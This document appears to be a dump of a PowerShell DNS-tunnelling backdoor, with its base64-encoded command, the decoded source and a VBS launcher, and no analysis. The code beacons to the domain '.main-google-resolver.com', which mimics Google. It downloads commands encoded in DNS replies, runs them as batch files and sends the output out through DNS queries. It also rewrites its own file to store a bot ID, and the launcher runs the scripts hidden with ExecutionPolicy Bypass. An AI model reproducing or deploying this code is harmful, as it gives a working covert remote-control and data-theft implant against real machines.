| powershell -EncodedCommand "JABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AcwB0ACAAPQAgACcALgBtAGEAaQBuAC0AZwBvAG8AZwBsAGUALQByAGUAcwBvAGwAdgBlAHIALgBjAG8AbQAnADsADQAKACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAIAA9ACAAJwAnADsADQAKACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAD0AIAAwADsADQAKACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAAPQAgACcAIwAjACMAJwA7AA0ACgAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAIAA9ACAAIgAkAGUAbgB2ADoAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAFIAZQBjAG8AcgBkAGUAZABUAFYAXAAiADsADQAKAGYAdQBuAGMAdABpAG8AbgAgAGMAbwBuAHYAZQByAHQAVABvAC0AQgBhAHMAZQAzADYAIAAoACQAZABlAGMATgB1AG0APQAiACIAKQANAAoAewANAAoAIAAgACAAIAAkAGQAZQBjAE4AdQBtACAAJQA9ACAANAA2ADYANQA2ADsADQAKACAAIAAgACAAJABhAGwAcABoAGEAYgBlAHQAIAA9ACAAIgAwADEAMgAzADQANQA2ADcAOAA5AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUQBSAFMAVABVAFYAVwBYAFkAWgAiADsADQAKACAAIAAgACAAZABvAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBtAGEAaQBuAGQAZQByACAAPQAgACgAJABkAGUAYwBOAHUAbQAgACUAIAAzADYAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABjAGgAYQByACAAPQAgACQAYQBsAHAAaABhAGIAZQB0AC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAkAHIAZQBtAGEAaQBuAGQAZQByACwAMQApADsADQAKACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUAMwA2AE4AdQBtACAAPQAgACIAJABjAGgAYQByACQAYgBhAHMAZQAzADYATgB1AG0AIgA7AA0ACgAgACAAIAAgACAAIAAgACAAJABkAGUAYwBOAHUAbQAgAD0AIAAoACQAZABlAGMATgB1AG0AIAAtACAAJAByAGUAbQBhAGkAbgBkAGUAcgApACAALwAgADMANgA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAdwBoAGkAbABlACAAKAAkAGQAZQBjAE4AdQBtACAALQBnAHQAIAAwACkAOwANAAoAIAAgACAAIAAkAGIAYQBzAGUAMwA2AE4AdQBtAC4AUABhAGQATABlAGYAdAAoADMALAAnADAAJwApADsADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AFMAdQBiACgAJABtAHkAZgBsAGEAZwAyACwAIAAkAGMAbQBkAGkAZAA9ACcAMAAwACcALAAgACQAcABhAHIAdABpAGQAPQAnADAAMAAwACcAKQANAAoAewANAAoAIAAgACAAIABpAGYAKAAkAG0AeQBmAGwAYQBnADIAIAAtAGUAcQAgADAAKQANAAoAIAAgACAAIAB7AA0ACgAJAAkAKAAnAHoAegAwADAAMAAwADAAMAAnACsAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBhAHgAaQBtAHUAbQAgADQANgA2ADUANQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAG0AeQBmAGwAYQBnADIAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAHoAegAnACsAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAKwAnADAAMAAwADAAMAAnACsAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBhAHgAaQBtAHUAbQAgADQANgA2ADUANQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAG0AeQBmAGwAYQBnADIAIAAtAGUAcQAgADIAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAHoAegAnACsAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAKwAkAGMAbQBkAGkAZAArACQAcABhAHIAdABpAGQAKwAoAGMAbwBuAHYAZQByAHQAVABvAC0AQgBhAHMAZQAzADYAKABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAANAA2ADYANQA1ACkAKQApADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAMgBIAGUAeAAoACQAbQB5AHMAdAByACkADQAKAHsADQAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEQAZQBmAGEAdQBsAHQALgBHAGUAdABCAHkAdABlAHMAKAAkAG0AeQBzAHQAcgApACkALgBSAGUAcABsAGEAYwBlACgAIgAtACIALAAgACIAIgApADsADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAEEAbABpAHYAZQANAAoAewANAAoACQBpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAJwAjACcAKwAnACMAIwAnACkADQAKAAkAewANAAoACQAJAHIAZQB0AHUAcgBuACAAMAA7AA0ACgAJAH0ADQAKACAAIAAgACAAUwBlAG4AZABSAGUAYwBlAGkAdgBlAEQATgBTACAAKAAoAEcAZQB0AFMAdQBiACAAMQApACsAJwAzADAAJwApADsADQAKACAAIAAgACAAJABzAHUAYgAgAD0AIAAoACgARwBlAHQAUwB1AGIAIAAxACkAKwAnADIAMwAyAEEAJwApACAAKwAgACgAUwB0AHIAMgBIAGUAeAAgACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAKQA7AA0ACgAgACAAIAAgACQAaQAgAD0AIAAxADsADQAKACAAIAAgACAAJAByAGUAdAAgAD0AIAAwADsADQAKACAAIAAgACAAdwBoAGkAbABlACgAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAALQBlAHEAIAAxACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHQAIAA9ACAAMQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABzAHUAYgAyACAAPQAgACQAcwB1AGIAIAArACAAKABTAHQAcgAyAEgAZQB4ACAAJABpACkAOwANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACQAcwB1AGIAMgA7AA0ACgAgACAAIAAgACAAIAAgACAAJABpACsAKwA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAdAAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIABGAGkAeABCAGEAdABGAGkAbABlACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAIgAuAGIAYQB0ACIAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAdAA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAoACQAZAApAA0ACgB7AA0ACgAJACQAYwBuAHQAIAA9ACAAMAA7AA0ACgAJAHcAaABpAGwAZQAgACgAJABjAG4AdAAgAC0AbAB0ACAAMgAwACkADQAKAAkAewANAAoACQAJAHQAcgB5AA0ACgAJAAkAewANAAoACQAJAAkAJABtAHkAZABhAHQAYQAgAD0AIAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEQATgBTAF0AOgA6AEcAZQB0AEgAbwBzAHQAQgB5AE4AYQBtAGUAKAAkAGQAKwAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBzAHQAKQAuAEEAZABkAHIAZQBzAHMATABpAHMAdABbADAAXQApADsADQAKAAkACQAJACQAbQB5AGQAYQB0AGEAIAA9ACAAKAAkAG0AeQBkAGEAdABhACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJABfAC4ASQBQAEEAZABkAHIAZQBzAHMAVABvAFMAdAByAGkAbgBnAH0AKQA7AA0ACgAJAAkACQAkAGMAbgB0ACAAPQAgADIANQA7AA0ACgAJAAkAfQANAAoACQAJAGMAYQB0AGMAaAANAAoACQAJAHsADQAKAAkACQAJAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AbQAgADUAMAAwADsADQAKAAkACQAJACQAYwBuAHQAKwArADsADQAKAAkACQB9AA0ACgAJAH0ADQAKACAAIAAgACAAaQBmACgALQBuAG8AdAAoACQAYwBuAHQAIAAtAGUAcQAgADIANQApACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwAjACcAKwAnACMAIwAnACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAALQBlAHEAIAAwACAALQBhAG4AZAAgACQAbQB5AGQAYQB0AGEALgBTAHQAYQByAHQAcwBXAGkAdABoACgAJwAzADMALgAzADMALgAnACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB0AG0AcAAgAD0AIAAkAG0AeQBkAGEAdABhAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA2ACkALgBTAHAAbABpAHQAKAAnAC4AJwApADsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACAAPQAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMABdACkAIAArACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAxAF0AKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAAPQAgADEAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAkAG0AeQBkAGEAdABhAC4ARQBxAHUAYQBsAHMAKAAnADMANQAuADMANQAuADMANQAuADMANQAnACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAAPQAgADAAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB0AG0AcAAgAD0AIAAkAG0AeQBkAGEAdABhAC4AUwBwAGwAaQB0ACgAJwAuACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAQQBwAHAAZQBuAGQAQQBsAGwAVABlAHgAdAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAG0AZQArACcAdABwAFwAJwArACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAKwAiAC4AYgBhAHQAIgAsACAAKAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADAAXQApACAAKwAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMQBdACkAIAArACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAyAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADMAXQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAJwAjACcAKwAnACMAIwAnACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAG0AeQBkAGEAdABhAC4AUwBwAGwAaQB0ACgAJwAuACcAKQBbADAAXQApADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAARgBpAHgAQgBhAHQARgBpAGwAZQAgACgAJABiAGEAdABwAGEAdABoACkADQAKAHsADQAKACAAIAAgACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIAYQB0AHAAYQB0AGgAKQAuAFMAdQBiAHMAdAByAGkAbgBnACgAMQAwACkAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABiAGEAdABwAGEAdABoADsADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAZQBuAGQARgBpAGwAZQAoACQAbQB5AEYAaQBsAGUAUABhAHQAaAApAA0ACgB7AA0ACgAgACAAIAAgACQAbQB5AEYAaQBsAGUATgBhAG0AZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABGAGkAbABlAE4AYQBtAGUAVwBpAHQAaABvAHUAdABFAHgAdABlAG4AcwBpAG8AbgAoACQAbQB5AEYAaQBsAGUAUABhAHQAaAApADsADQAKACAAIAAgACAAJABtAHkAcwB0AHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABUAGUAeAB0ACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkAOwANAAoAIAAgACAAIAAkAGkAPQAwADsADQAKACAAIAAgACAAJABtAHkAdABlAG0AcAAgAD0AIAAnACcAOwANAAoAIAAgACAAIAAkAGoAPQAwADsADQAKACAAIAAgACAAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAkAG0AeQBzAHQAcgAuAEwAZQBuAGcAdABoACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbQB5AHQAZQBtAHAAIAArAD0AIAAkAG0AeQBzAHQAcgBbACQAaQBdADsADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAoACgAJABpACUAMgA0ACkAIAAtAGUAcQAgADIAMwApACAALQBvAHIAIAAoACQAaQAgAC0AZQBxACAAJABtAHkAcwB0AHIALgBMAGUAbgBnAHQAaAApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG0AeQBoAGUAeAAgAD0AIABTAHQAcgAyAEgAZQB4ACAAJABtAHkAdABlAG0AcAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAoACgARwBlAHQAUwB1AGIAIAAyACAAJABtAHkARgBpAGwAZQBOAGEAbQBlACAAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACAAJABqACkAKQAgACsAIAAkAG0AeQBoAGUAeAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAagArACsAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABtAHkAdABlAG0AcAAgAD0AIAAnACcAOwANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAkAGkAKwArADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAARwBlAHQASQBEAA0ACgB7AA0ACgAJACQAdgBhAGwAaQBkAGMAaABhAHIAcwAgAD0AIAAiADAAMQAyADMANAA1ADYANwA4ADkAQQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUABRAFIAUwBUAFUAVgBXAFgAWQBaAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcQByAHMAdAB1AHYAdwB4AHkAegAiADsADQAKACAAIAAgACAAJAB0AGkAZAAgAD0AIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAoACgARwBlAHQAUwB1AGIAIAAwACkAKwAnADMAMAAnACkAOwANAAoACQBpAGYAIAAoACQAdgBhAGwAaQBkAGMAaABhAHIAcwAuAEMAbwBuAHQAYQBpAG4AcwAoACQAdABpAGQAKQApAHsAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAPQAkAHQAaQBkADsAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAAQwBoAGEAbgBnAGUAVABoAGkAcwBGAGkAbABlACAAKAAkAGIAbwB0AGkAZAApAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAKAAnACMAJwArACcAIwAjACcAKQApACkADQAKACAAIAAgACAAewANAAoACQAJACQAZgBjAD0AKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGUAbgB2ADoAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAFIAZQBjAG8AcgBkAGUAZABUAFYAXABEAG4AUwAuAHAAcwAxACAALQBFAG4AYwBvAGQAaQBuAGcAIABBAHMAYwBpAGkAKQA7AA0ACgAJAAkAJABmAGMAPQAkAGYAYwAuAFMAdQBiAFMAdAByAGkAbgBnACgAJABmAGMALgBJAG4AZABlAHgATwBmACgAJwBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABcACIAJwApACsAMgA5ACkALgBUAHIAaQBtAEUAbgBkACgAJwBcACIAJwApADsADQAKAAkACQAkAGYAYwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAYwApACkAOwANAAoACQAJACQAZgBjAD0AJABmAGMAIAAtAHIAZQBwAGwAYQBjAGUAIAAoACcAIwAnACsAJwAjACMAJwApACwAJABiAG8AdABpAGQAOwANAAoACQAJACQAZgBjAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZgBjACkAKQA7AA0ACgAJAAkAJABmAGMAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAJwArACQAZgBjACsAJwAiACcAOwANAAoACQAJAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcAEQAbgBTAC4AcABzADEAIAAkAGYAYwAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpADsADQAKAAkAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdAANAAoAewANAAoAIAAgACAAIABpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAKAAnACMAJwArACcAIwAjACcAKQApAA0ACgAgACAAIAAgAHsADQAKAAkACQBtAGQAIAAtAEYAbwByAGMAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACkAOwANAAoACQAJAEcAZQB0AEkARAA7AA0ACgAJAAkAQwBoAGEAbgBnAGUAVABoAGkAcwBGAGkAbABlACAAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABtAGEAaQBuAA0ACgB7AA0ACgAgACAAIAAgAEkAbgBpAHQAOwANAAoAIAAgACAAIABpAGYAKABBAGwAaQB2AGUAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACAAPgAgACcAKwAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUwBlAG4AZABGAGkAbABlACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAG0AYQBpAG4AOwANAAoA" | |
| decodes to: | |
| $global:myhost = '.main-google-resolver.com'; | |
| $global:filename = ''; | |
| $global:myflag = 0; | |
| $global:myid = '###'; | |
| $global:myhome = "$env:Public\Libraries\RecordedTV\"; | |
| function convertTo-Base36 ($decNum="") | |
| { | |
| $decNum %= 46656; | |
| $alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"; | |
| do | |
| { | |
| $remainder = ($decNum % 36); | |
| $char = $alphabet.substring($remainder,1); | |
| $base36Num = "$char$base36Num"; | |
| $decNum = ($decNum - $remainder) / 36; | |
| } | |
| while ($decNum -gt 0); | |
| $base36Num.PadLeft(3,'0'); | |
| } | |
| function GetSub($myflag2, $cmdid='00', $partid='000') | |
| { | |
| if($myflag2 -eq 0) | |
| { | |
| ('zz000000'+(convertTo-Base36(Get-Random -Maximum 46655))); | |
| } | |
| elseif($myflag2 -eq 1) | |
| { | |
| ('zz'+$global:myid+'00000'+(convertTo-Base36(Get-Random -Maximum 46655))); | |
| } | |
| elseif($myflag2 -eq 2) | |
| { | |
| ('zz'+$global:myid+$cmdid+$partid+(convertTo-Base36(Get-Random -Maximum 46655))); | |
| } | |
| } | |
| function Str2Hex($mystr) | |
| { | |
| [System.BitConverter]::ToString([System.Text.Encoding]::Default.GetBytes($mystr)).Replace("-", ""); | |
| } | |
| function Alive | |
| { | |
| if($global:myid -eq '#'+'##') | |
| { | |
| return 0; | |
| } | |
| SendReceiveDNS ((GetSub 1)+'30'); | |
| $sub = ((GetSub 1)+'232A') + (Str2Hex $global:filename); | |
| $i = 1; | |
| $ret = 0; | |
| while($global:myflag -eq 1) | |
| { | |
| $ret = 1; | |
| $sub2 = $sub + (Str2Hex $i); | |
| SendReceiveDNS $sub2; | |
| $i++; | |
| } | |
| if($ret -eq 1) | |
| { | |
| FixBatFile ($global:myhome+'tp\'+$global:filename+".bat"); | |
| } | |
| $ret; | |
| } | |
| function SendReceiveDNS ($d) | |
| { | |
| $cnt = 0; | |
| while ($cnt -lt 20) | |
| { | |
| try | |
| { | |
| $mydata = ([System.Net.DNS]::GetHostByName($d+$global:myhost).AddressList[0]); | |
| $mydata = ($mydata | ForEach-Object {$_.IPAddressToString}); | |
| $cnt = 25; | |
| } | |
| catch | |
| { | |
| Start-Sleep -m 500; | |
| $cnt++; | |
| } | |
| } | |
| if(-not($cnt -eq 25)) | |
| { | |
| ('#'+'##'); | |
| } | |
| elseif($global:myflag -eq 0 -and $mydata.StartsWith('33.33.')) | |
| { | |
| $tmp = $mydata.SubString(6).Split('.'); | |
| $global:filename = ([char] [int] $tmp[0]) + ([char] [int] $tmp[1]); | |
| $global:myflag = 1; | |
| } | |
| elseif ($mydata.Equals('35.35.35.35')) | |
| { | |
| $global:myflag = 0; | |
| } | |
| elseif ($global:myflag -eq 1) | |
| { | |
| $tmp = $mydata.Split('.'); | |
| [System.IO.File]::AppendAllText($global:myhome+'tp\'+$global:filename+".bat", (([char] [int] $tmp[0]) + ([char] [int] $tmp[1]) + ([char] [int] $tmp[2]) + ([char] [int] $tmp[3]))); | |
| } | |
| elseif($global:myid -eq '#'+'##') | |
| { | |
| ([char] [int] $mydata.Split('.')[0]); | |
| } | |
| } | |
| function FixBatFile ($batpath) | |
| { | |
| (Get-Content $batpath).Substring(10) | Set-Content $batpath; | |
| } | |
| function SendFile($myFilePath) | |
| { | |
| $myFileName = [System.IO.Path]::GetFileNameWithoutExtension($myFilePath); | |
| $mystr = [System.IO.File]::ReadAllText($myFilePath); | |
| $i=0; | |
| $mytemp = ''; | |
| $j=0; | |
| while($i -le $mystr.Length) | |
| { | |
| $mytemp += $mystr[$i]; | |
| if((($i%24) -eq 23) -or ($i -eq $mystr.Length)) | |
| { | |
| $myhex = Str2Hex $mytemp; | |
| SendReceiveDNS ((GetSub 2 $myFileName (convertTo-Base36 $j)) + $myhex); | |
| $j++; | |
| $mytemp = ''; | |
| } | |
| $i++; | |
| } | |
| } | |
| function GetID | |
| { | |
| $validchars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; | |
| $tid = SendReceiveDNS ((GetSub 0)+'30'); | |
| if ($validchars.Contains($tid)){$global:myid=$tid;} | |
| } | |
| function ChangeThisFile ($botid) | |
| { | |
| if(-not($global:myid -eq ('#'+'##'))) | |
| { | |
| $fc=(Get-Content $env:Public\Libraries\RecordedTV\DnS.ps1 -Encoding Ascii); | |
| $fc=$fc.SubString($fc.IndexOf('powershell -EncodedCommand \"')+29).TrimEnd('\"'); | |
| $fc=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($fc)); | |
| $fc=$fc -replace ('#'+'##'),$botid; | |
| $fc=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($fc)); | |
| $fc='powershell -EncodedCommand "'+$fc+'"'; | |
| Set-Content $env:Public\Libraries\RecordedTV\DnS.ps1 $fc -Encoding Ascii; | |
| } | |
| } | |
| function Init | |
| { | |
| if($global:myid -eq ('#'+'##')) | |
| { | |
| md -Force ($global:myhome+'tp\'); | |
| GetID; | |
| ChangeThisFile $global:myid; | |
| } | |
| } | |
| function main | |
| { | |
| Init; | |
| if(Alive -eq 1) | |
| { | |
| Invoke-Expression ($global:myhome+'tp\'+$global:filename+'.bat > '+$global:myhome+'tp\'+$global:filename+'.txt'); | |
| SendFile ($global:myhome+'tp\'+$global:filename+'.txt'); | |
| Remove-Item ($global:myhome+'tp\'+$global:filename+'.bat'); | |
| Remove-Item ($global:myhome+'tp\'+$global:filename+'.txt'); | |
| } | |
| } | |
| main; | |
| ---------------------------------- backup.vbs ---------------------------------- | |
| In Cell X1 | |
| HOME="%public%\Libraries\RecordedTV\" | |
| DnECmd="powershell -ExecutionPolicy Bypass -File "&HOME&"DnE.ps1" | |
| CreateObject("WScript.Shell").Run DnECmd,0 | |
| DnsCmd="powershell -ExecutionPolicy Bypass -File "&HOME&"DnS.ps1" | |
| CreateObject("WScript.Shell").Run DnsCmd,0 | |
| ---------------------------------- ---------------------------------- | |
